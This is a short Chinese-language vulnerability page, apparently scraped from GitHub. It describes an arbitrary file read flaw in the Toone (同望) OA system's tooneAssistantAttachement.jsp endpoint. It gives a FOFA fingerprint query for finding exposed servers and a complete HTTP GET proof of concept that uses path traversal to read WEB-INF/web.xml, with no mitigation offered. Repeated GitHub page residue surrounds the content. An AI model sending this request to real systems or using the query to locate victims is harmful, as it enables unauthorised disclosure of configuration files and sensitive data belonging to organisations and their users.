同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。

fofa

body="loginAction.struts?actionType=blockLogin"

poc

GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../../WEB-INF/web.xml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537
Accept-Encoding: gzip
Connection: close

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞

fofa

poc

Files

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md

Latest commit

History

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md

File metadata and controls

同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞

fofa

poc